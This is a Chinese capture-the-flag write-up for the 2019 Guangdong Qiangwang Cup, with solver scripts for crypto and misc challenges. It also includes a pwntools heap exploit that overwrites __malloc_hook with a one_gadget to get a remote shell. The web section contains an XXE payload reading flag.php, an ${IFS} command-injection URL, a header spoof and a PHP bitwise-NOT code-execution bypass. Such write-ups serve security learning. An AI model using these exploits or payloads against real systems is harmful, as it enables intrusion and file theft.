2019广东强网杯_wp

Pwn

pwn1

  • Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
from pwn import *
context.log_level = 'debug'

#p = process('./pwn1')
p = remote('119.61.19.212',8087)

def sl(x):
p.sendline(x)

def ru(x):
p.recvuntil(x)

def se(x):
p.send(x)

def malloc(idx,cont):
ru('run\n')
sl('1')
ru('index:\n')
sl(str(idx))
ru('content:\n')
sl(cont)

def free(idx):
ru('run\n')
sl('2')
ru('index:\n')
sl(str(idx))

def run(idx,cont):
ru('run\n')
sl('3')
ru('index:\n')
sl(str(idx))
ru('key:\n')
se(cont)


malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666')
malloc(7,'777')
malloc(8,'888')

for i in range(1,8):
free(str(i))

run(0,'a'*8)
free(0)
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30


sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')

for i in range(2):
malloc('1','1')

run(1,'a')
free(1)

ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)

sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')

info('malloc hook : 0x%x'%malloc_hook)
run(2,str(malloc_hook^leak_heap))
free(2)

sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))

ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()

Misc

完美的错误

  • 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)


def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""

long_value = int(v.encode("hex_codec"), 16)

result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result

# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0':
nPad += 1
else:
break

return (__b58chars[0] * nPad) + result


def b58decode(v):
""" decode v into a string of len bytes
"""

long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base ** i)

result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result

nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
else:
break

result = chr(0) * nPad + result
return result

def pailie(a):
aa = a[0]
bb = a[1:]+aa
return bb

if __name__ == "__main__":

for i in range(58):
__b58chars = pailie(__b58chars)
#print b58encode("hello world")
print b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX")

撸啊撸

  • 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复

1
2
3
4
5
6
7
a = '938gce1`872db99db`b342d23c0g9g2d'
flag = ""
for i in a:
b = chr(ord(i) ^ 1)
flag += b

print 'flag{'+flag+'}'

脑筋急转弯

  • 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt

  • 012换成.!?,然后ook,brainfuck解码

抓灰阔

  • 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Cipher import AES

key = 'ba4ae3277932b0a2'

cipher = AES.new(key, AES.MODE_ECB)

#print(msg.encode("hex"))
f= open('./data/flag.enc','rb')
data = f.read()
f.close()
msg = data.decode('base64')
#msg = data
decipher = AES.new(key, AES.MODE_ECB)
f = open('./data/flag_dec.class','wb+')
print decipher.decrypt(msg)
b = decipher.decrypt(msg)
#print b
f.write(b)
  • 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件

写脚本解密

Crypto

强大的hash

  • 给了个hash,需要我们写脚本爆破,这里有个坑点是hash加密类型是$argon2d,不支持php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from argon2 import PasswordHasher


list = ["114","119","110","120","121","122","170","189","180","133","144","911"]

ph = PasswordHasher()
hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"
for i in list:
for j in list:
char = 'CTF_' + i + '_' + j
try:
print char
if (ph.verify(hash, char)):
print 'done : ',char
exit(0)
except Exception:
pass

遗失的秘密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
#!/usr/bin/python
#-*- coding:utf-8 -*-

import re
import pickle
from itertools import product
from libnum import invmod, gcd


def solve_linear(a, b, mod):
if a & 1 == 0 or b & 1 == 0:
return None
return (b * invmod(a, mod)) & (mod - 1) # hack for mod = power of 2


def to_n(s):
s = re.sub(r"[^0-9a-f]", "", s)
return int(s, 16)


def msk(s):
cleaned = "".join(map(lambda x: x[-2:], s.split(":")))
return msk_ranges(cleaned), msk_mask(cleaned), msk_val(cleaned)


def msk_ranges(s):
return [range(16) if c == " " else [int(c, 16)] for c in s]


def msk_mask(s):
return int("".join("0" if c == " " else "f" for c in s), 16)


def msk_val(s):
return int("".join("0" if c == " " else c for c in s), 16)


E = 65537

N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
19:ad:"""





p_ranges, pmask_msk, pmask_val = msk("""00: :05:89: :bd:35: : :23: : : : :84:
: :ed: :70:14: : : :10: : :87: :51:
ea: :97:69: :52: : : : : :ea: : :15:
: :34: :be:11:23: : :34:14: :94: :10:
: :74:87:37:ee:81:62:ee:95: : :dc:49:dd:
: :35: :81: :fa: : : :86: : : :fb:
:93: : :12: :14: :ab:76: :96: : :27:
:21: :04:01:41: :98: :ff: : :12:dc: :
cd: :39:95:30: :47: :fa:ff: :34: :ad: :
:52:02:fa:bc:14:22:22:48:61:62:bd:53: : :
72:08:cb:41:88: : : :63:91:30:fe: : :42:
87: :18:52: :39:dd: :68: :fe:06:88:81: :
: : :ae:fd: : :fb:21:37:59: :53: :fa:
:07:40:eb:33:77:51:64:10:dd: :73: :86:62:
:bf: :79: :34: :bb: :44:ff: :46:fe:90:
ef: :52:ad: : :fe: :69:18:89:bd:cd:09:46:
: :74:71: : : :41:66: : :11: :25: :
39:8b""")

q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef: :76:58:17:43:31: : :32:70: :
89: : :36:55:06: :79:66:78: : : : : :
:85: : : : : :33:bb: : :56: :66:cb:
:08: : :90:cb: : :24:fa:ca:47: : : :
:88: :83:01: :62: : : : : : :ad:ae:
: : :58: :ec: : : :09:04:86: :05:00:
:df:50:84:81:80: :ae: :24: :94:da: :04:
ce: :ef: : :ed:be:bf:43:78: : :05:93: :
08:52:05: : : : :ae: : : : :ab: : :
:76:ce: : : : :19:bd:22: :ef:dc:bf:ea:
ab:78:01: : :85: : : :ea: : :fb: : :
92:66:19: : :ab: : :82: : :31: : :da:
82: :13:82:43: : :94:13:41: : : :37: :
:04:56:02:87:dd: :58:27: : :24: : : :
28: : :09:14:89: : : :49:59: :16:eb:65:
:01:22: : :dd: :78: : :db:90: :ac: :
:fd: :03:74: : : : :92: :00:ba: : :
:05""")

_, dmask_msk, dmask_val = msk("""11: : :69:62:64: : : : :15: :13:de:de:
cf: : :17: : :75: :98:42:fc: :12:15:08:
: : : : :36: :be:25:48: : :19: : :
:47:11:19: :03: :49:fc:da: :96:45:eb: :
: : :91: :ea: : :55:ff: :37:58: : :
19: : :73:40: :91:15:01:da:91:22:fd:32: :
: :50: : :66: : : :42: : :ef: : :
df:42: :97:30: :39: : : : : : :dc: :
: : : : :38: : : :88:28: :05: : :
78:59:fa: :86: :19:24: : : : :da:cf:15:
39: : : : :ef:55: :ce:47: :58:89: :fb:
:24: : : :92: : :ee: : :db:67:31:ce:
:28: :72:ec:89: :04: : :50: : : : :
:37: :44: : : : :56: :38: :bb:47:bb:
66:83:99:22:07:72: : :48:52:02: : : :29:
:82:56: :67: :95: : :56:94: : :71: :
bf:27:98: : :54:98:26:06:87: :ae: :53:be:
: :80:37:60:61:ea:ef:de: : :df:90:81: :
70: :06:33:26: :75:fe:95: :92: :78:cd:05:
64:cc:68: : :36:54: :bd:16:90:ee:60: : :
: :41: : :91: :79:58:06:50: :46: : :
45: :09:ca:ac:16: :27:98: : :ba:82: :77:
93:98:ad: :15: :67:53:97:ad:ee:50:44: :31:
07: :ff:01: :09: : : : : :46: : :42:
15: :db:df:42:be: : : :78: :41: : : :
:14: : :25:fc: :84: : : : : : :20:
da:46:01:eb:87: :12:57: : :56:af: :87:93:
60: :02: :18:89:63:72:ad: :ed:cf: : :84:
:22: :13: : :dd: :ff: : : :de:62:37:
:19:66: : :86:02: :38: : : : :ec:14:
12: :43:93:19:65:98: : :03: : : :ef: :
: :ca:07:92:22: : :bb:15:eb: : : :35:
:72:29:cd: : :99: : : : :41:06: : :
:43:33: :32: : :54:be:92:62: :78:59:42:
79:89""")

_, dpmask_msk, dpmask_val = msk(""" :39: :28:16:02:89:ce:11:fe: : : : :af:
: : :ed:97: : :11:20:ba:ae:98:ad: : :
:10:87:ac:07: : : : :50: : :70:50:52:
df:89:eb:02: : : : :93:11: : :12: :56:
:08: : :ea: :10:fa:19: : : :54:45:07:
: :bc:ff:33: :db:63:49:fe:52: :33: : :
bf:cd:45:91: :10: : :92:81:40:03: :80: :
29: :30: :ed:43:64:ca: :bf:64: : :bf: :
: : :24:72:84: : :ff: : :24: :81:27:
db:23: :64: :67: :ba: : :bc: : : : :
:ae:88: : : : : :91: : :14: :ba:ef:
:89: : : : : : : : :05: :75:52: :
: : :be:ad:df: :02:88:00: : :15:45: :
cf:32: :ca: :93: :32: :40: :27:dd: :19:
73:dc: : : : : :cf: : :dd: : :ca: :
ee: :ca: : : :49: :27: :58:53: :64:25:
:22:06:16:ff:62:bc: : : : :24:fc: : :
df""")

_, dqmask_msk, dqmask_val = msk("""02: :bd: :19:25:98:75: :65: :55:28:33:bc:
34:84:91:01:96: : :08: :32:45: :27: : :
:fe: :bb:63:32:68: :51:bd:75:40: :52:52:
: : :78:85:fc:94: :07: :14: : : : :
15:dd: : :93: :01: : :77:ca: :40: :da:
:89:bc:87:62:dc:ac:61:88: : :70: :69: :
:36: : :21:08: :dc:73: :ad:da:ee:fe: :
96: :58: : :46: :29:ff:97:ce: : : :cb:
51: : :81: :22: : :19: :10:69:41:36:ca:
:22:49: :cc:cf:06: : :08: :76: : :45:
98: : :45: : : :69:13:65: : :da:54: :
19: :ee:24: :73: : : : : : :18:53:40:
21:25: : :84:52:cd: :49:33:78: : :ed: :
25:27: : : :ca: : : :ca: : :bc: :02:
31:70: :10:ca:84:59: : : :52: :27:76: :
47: :66:bf:ff: :03: :99:ff: :df: : : :
:46:27:45: :65:07: :48:da:dc: :80: : :
f9""")


def search(K, Kp, Kq, check_level, break_step):
max_step = 0
cands = [0]
for step in range(1, break_step + 1):
#print " ", step, "( max =", max_step, ")"
max_step = max(step, max_step)

mod = 1 << (4 * step)
mask = mod - 1

cands_next = []
for p, new_digit in product(cands, p_ranges[-step]):
pval = (new_digit << ((step - 1) * 4)) | p

if check_level >= 1:
qval = solve_linear(pval, N & mask, mod)
if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
continue

if check_level >= 2:
val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
if val is None or not check_val(val, mask, dmask_msk, dmask_val):
continue

if check_level >= 3:
val = solve_linear(E, 1 + Kp * (pval - 1), mod)
if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
continue

if check_level >= 4:
val = solve_linear(E, 1 + Kq * (qval - 1), mod)
if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
continue

if pval * qval == N:
print "Kq =", Kq
print "pwned"
print "p =", pval
print "q =", qval
p = pval
q = qval
d = invmod(E, (p - 1) * (q - 1))
coef = invmod(p, q)

from Crypto.PublicKey import RSA
print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
quit()

cands_next.append(pval)

if not cands_next:
return False
cands = cands_next
return True



def check_val(val, mask, mask_msk, mask_val):
test_mask = mask_msk & mask
test_val = mask_val & mask
return val & test_mask == test_val


# K = 4695
# Kp = 15700
# Kq = 5155

for i in range(0xff):
N = N_ + hex(i)[2:].rjust(2,'0')

N = to_n(N)
print "index : ",i

for K in range(1, E):
# if K % 100 == 0:
# print "checking", K
if search(K, 0, 0, check_level=2, break_step=20):
print "K =", K
break

for Kp in range(1, E):
# if Kp % 1000 == 0:
# print "checking", Kp
if search(K, Kp, 0, check_level=3, break_step=30):
print "Kp =", Kp
break

for Kq in range(1, E):
# if Kq % 100 == 0:
# print "checking", Kq
if search(K, Kp, Kq, check_level=4, break_step=9999):
print "Kq =", Kq
break
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/python
# coding=utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import gmpy2

p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309

N = p*q
e = 65537

#print N
#print e
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)
# with open('private.pem', 'r') as f:
# private = RSA.importKey(f)
# oaep = PKCS1_OAEP.new(private)

with open('flag.txt.en', 'rb') as f:
data_enc = int(f.read().encode('hex'),16)
plain = gmpy2.powmod(data_enc, d, N)
plain = hex(plain)[2:]
if len(plain) % 2 != 0:
plain = '0' + plain
print plain.decode('hex')

美好的回忆

利用第二段 爆破key,然后解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#coding:utf-8

raw ="ood time"

two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]

iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]

#通过iv 和 密文 和 原文 可以算出 key

key = []
for i in raw:
key.append(ord(i))


t_key =[]

for i in xrange(8):
for j in xrange(256):
if two[i]^j^iv[i] == key[i]:
# t_key.append(chr(key[i]))
t_key.append(j)

print t_key


f = file('flag.txt.encrypted','r')



raw_iv = f.read(8)

flag=''

for i in xrange(7):
enc = f.read(8)
for i in xrange(8):
flag+=chr(ord(raw_iv[i])^t_key[i]^ord(enc[i]))
raw_iv = enc

print flag

悲伤的结局

  • 爆破 最后的padding 其他和上一题一样
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#coding:utf-8


# print 19 ^ 24 ^ 1
# exit()



raw ="keep away from xiaocui!"

# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"


BLOCK_SIZE =8

def pad(data):
padding_len = BLOCK_SIZE - len(data) % BLOCK_SIZE
return data + (chr(padding_len) * padding_len).encode()

#存在8种可能性

for i in xrange(8):
print '--------------------'
n=i+1
raw_last = raw[-n-8:-n]
print raw_last
print pad(raw_last)
raw_last = pad(raw_last)

iv = [0x15,0xEC,0x98,0x1C,0x6E,0xCD,0x6A,0x35]
two = [0xDB, 0xDD, 0x3C, 0x5E, 0x91, 0xE7, 0x20, 0x1F]
# two = [0x14, 0xED, 0x9E, 0x1C, 0x38, 0xCC, 0x2E, 0x0D]


two = [0xF7,0x84,0x4B,0xE5,0x61,0x93,0x7B,0x98]
iv =[0x0A,0x23,0x86,0xED,0xB9,0xFF,0x9D,0x81]

# two = [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]

# two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]

#[247, 83, 193, 36, 156, 73, 115, 24]
# two = [0xEB,0xB6,0x57,0x30,0xAC,0x8D,0x55,0x1D]
# iv = [0x14,0xED,0x9E,0x1C,0x38,0xCC,0x2E,0x0D]

# 通过iv 和 密文 和 原文 可以算出 key

[0xE5, 0x20, 0xD1, 0x51, 0x08, 0xDB, 0x11, 0xF3]
[0x56, 0x04, 0xEB, 0xA1, 0xDA, 0xB7, 0xFD, 0xF7]
[0xFD, 0xA7, 0x71, 0xBC, 0x13, 0x9E, 0x13, 0xBC]
[0x4C, 0x08, 0xAE, 0xA6, 0x92, 0xBC, 0xFC, 0xA3]
[0xB1, 0xBA, 0x66, 0xBA, 0x5F, 0x89, 0x5C, 0xA1]
[0x02, 0x5C, 0xA8, 0xBB, 0x9B, 0xAC, 0xAE, 0xEA]
[0xB7, 0xFF, 0x73, 0xA0, 0x4E, 0x93, 0x02, 0xA1]
[0x08, 0x4C, 0xBD, 0xE9, 0x86, 0xB1, 0xA2, 0xBE]
[0xBD, 0xEF, 0x6E, 0xF2, 0x07, 0x98, 0x5B, 0xB0]
[0x13, 0x07, 0xDE, 0xCC, 0xCE, 0xBD, 0xB8, 0xB3]
[0xE2, 0xE1, 0x05, 0xD6, 0x4F, 0x85, 0x50, 0xBD]
[0x46, 0x07, 0xD4, 0xD6, 0x9D, 0xBA, 0xFC, 0xF6]
[0xF8, 0xAE, 0x00, 0xCC, 0x49, 0x9B, 0x19, 0xB3]
[0x2F, 0x0E, 0xD6, 0xC4, 0x8F, 0xAC, 0xA9, 0xBD]
[0xCA, 0xFA, 0x0A, 0x9C, 0x4B, 0xD5, 0x4B, 0xE1]
[0x22, 0x0A, 0x88, 0xCD, 0x88, 0xAD, 0xAE, 0xBC]
[0x9B, 0xFF, 0x0B, 0xC7, 0x19, 0xD9, 0x48, 0xE6]
[0x70, 0x0C, 0x80, 0xCD, 0x81, 0xA6, 0xB5, 0x87]
[0xFE, 0xA5, 0x1A, 0xFD, 0x4F, 0x9F, 0x5B, 0x8B]
[0x0F, 0x30, 0xCF, 0xB4, 0xBD, 0xBA, 0xB6, 0x90]
[0xBE, 0x93, 0x59, 0x8E, 0x73, 0xD6, 0x78, 0x9A]
[0x0A, 0x23, 0x86, 0xED, 0xB9, 0xFF, 0x9D, 0x81]
iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
two =[0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
[0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
#


key = []
for i in raw_last:
key.append(ord(i))

t_key = []

for i in xrange(8):
for j in xrange(256):
if two[i] ^ j ^ iv[i] == key[i]:
# t_key.append(chr(key[i]))
t_key.append(j)

print t_key

f = file('flag.txt.encrypted', 'r')

raw_iv = f.read(8)

flag = ''

for i in xrange(24):
enc = f.read(8)
for i in xrange(8):
flag += chr(ord(raw_iv[i]) ^ t_key[i] ^ ord(enc[i]))
raw_iv = enc

print flag

exit()

Web

XX

  • 源码泄漏 index.php~,Xxe 利用
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    POST /index.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: zh-CN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 119.61.19.212:8083
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Content-Length: 225

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
    <creds>
    <user>&xxe;</user>
    <pass>111</pass>`</creds>

ping

  • 利用ifs绕过空格,利用/flag绕过flag
1
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*

小明拒绝

  • 头部加上
1
2
X-Forwarded-For: 127.0.0.1
Cookie: admin=1

php

  • 利用取反
1
2
3
4
5
6
7
8
9
10
<?php
/**
* Created by PhpStorm.
* User: y0unge
* Date: 2019-09-09
* Time: 17:30
*/

//echo (~urldecode("%8F"));
echo urlencode(~"GetYourFlag");

生成取反的exp

即可

1
view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();

找漏洞

  • 存在注入,可以读出信息

  • 密码明文

  • 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面

API

  • 扫描目录发现

  • 直接有flag

  • 常规思路应该是Api目录爆破file参数,读到hack.php文件代码,hack.php写文件